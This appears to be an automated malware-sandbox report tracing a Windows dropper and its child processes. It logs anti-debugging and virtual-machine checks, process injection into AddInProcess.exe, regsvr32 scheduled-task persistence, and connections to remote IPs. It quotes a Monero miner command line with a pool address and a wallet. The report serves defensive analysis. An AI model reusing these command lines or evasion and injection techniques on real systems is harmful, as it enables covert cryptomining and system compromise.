                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 60000
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59874
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59765
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59655
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59547
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59437
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59328
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59217
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59109
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59000
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58890
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58781
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58671
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58562
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58452
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58343
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58234
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58124
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 58015
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57906
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57796
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57687
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57578
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57468
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57359
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57250
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57137
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 57016
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 180000
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59890
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59781
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59670
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59563
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59438
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59313
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59188
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 1199062
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59671
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59562
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59453
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59343
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59198
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 59090
                              Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 599172
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                              Source: skotes.exe, skotes.exe, 00000003.00000002.1404790158.0000000000310000.00000040.00000001.01000000.00000007.sdmp, Fe36XBk.exe, Fe36XBk.exe, 0000000A.00000002.1942225456.00000000005FF000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                              Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259239960.00000000010C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM
                              Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                              Source: kUHbhqh.exe, 0000000B.00000003.2154868593.0000020E9A03C000.00000004.00000020.00020000.00000000.sdmp, Ryu8yUx.exe, 0000000D.00000002.2259239960.00000000010EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Ryu8yUx.exe, 0000000D.00000002.2259239960.00000000010EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWk
                              Source: Mc3FDUMnVz.exe, 00000000.00000002.1374368448.0000000000B30000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1401829404.0000000000310000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1404790158.0000000000310000.00000040.00000001.01000000.00000007.sdmp, Fe36XBk.exe, 0000000A.00000002.1942225456.00000000005FF000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                              Source: Fe36XBk.exe, 0000000A.00000002.1945770334.0000000005161000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K,<=;;?9:VMcI;8
                              Source: powershell.exe, 00000023.00000002.3030055586.0000011B47CF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeSystem information queried: ModuleInformationJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeProcess information queried: ProcessInformationJump to behavior

                              Anti Debugging

                              barindex
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeThread information set: HideFromDebuggerJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeOpen window title or class name: regmonclass
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeOpen window title or class name: gbdyllo
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeOpen window title or class name: procmon_window_class
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeOpen window title or class name: filemonclass
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeFile opened: NTICE
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeFile opened: SICE
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeFile opened: SIWVID
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeCode function: 0_2_04C00B68 rdtsc 0_2_04C00B68
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 13_2_004431A0 LdrInitializeThunk,13_2_004431A0
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 12_2_035B90D5 mov edi, dword ptr fs:[00000030h]12_2_035B90D5
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 12_2_035B9252 mov edi, dword ptr fs:[00000030h]12_2_035B9252
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Windows\System32\regsvr32.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeMemory allocated: page read and write | page guardJump to behavior

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 140.82.121.3 443
                              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 93.88.203.169 39001
                              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 162.159.133.233 443
                              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 185.199.111.133 443
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeCode function: 12_2_035B90D5 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,12_2_035B90D5
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeMemory written: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000 value starts with: 4D5A
                              Source: C:\Windows\System32\regsvr32.exeThread register set: target process: 6936
                              Source: C:\Windows\System32\regsvr32.exeThread register set: target process: 7876
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140000000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 140001000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14037F000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1404EA000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 14079A000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BA000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BB000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407BE000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C0000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C1000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 1407C7000
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: E39C59E010
                              Source: C:\Windows\System32\regsvr32.exeMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe base: 20771A8010
                              Source: C:\Users\user\Desktop\Mc3FDUMnVz.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe "C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe "C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\JeDkUsy6Fzs0.bat" "Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeProcess created: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe "C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe"Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 5 localhost
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe"
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpProcess created: C:\Users\user\AppData\Roaming\Stamp_Setup.exe "C:\Users\user\AppData\Roaming\Stamp_Setup.exe" /VERYSILENT
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4A8meVpR5Km4Ny7BkpDqgjDkgHB22GTAL9MHtQkBJXWwj329eVFHevcVZCk7eUH5NEdPU5DVaepPocR2Bznv1ZJnLKvR1AA.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
                              Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL C:\Users\user\AppData\Roaming\9mpr_8.ocx' }) { exit 0 } else { exit 1 }"
                              Source: Fe36XBk.exe, Fe36XBk.exe, 0000000A.00000002.1942225456.00000000005FF000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: eXv`Program Manager
                              Source: skotes.exe, skotes.exe, 00000003.00000002.1404790158.0000000000310000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: TProgram Manager
                              Source: Fe36XBk.exe, 0000000A.00000002.1942225456.00000000005FF000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: oeXv`Program Manager
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
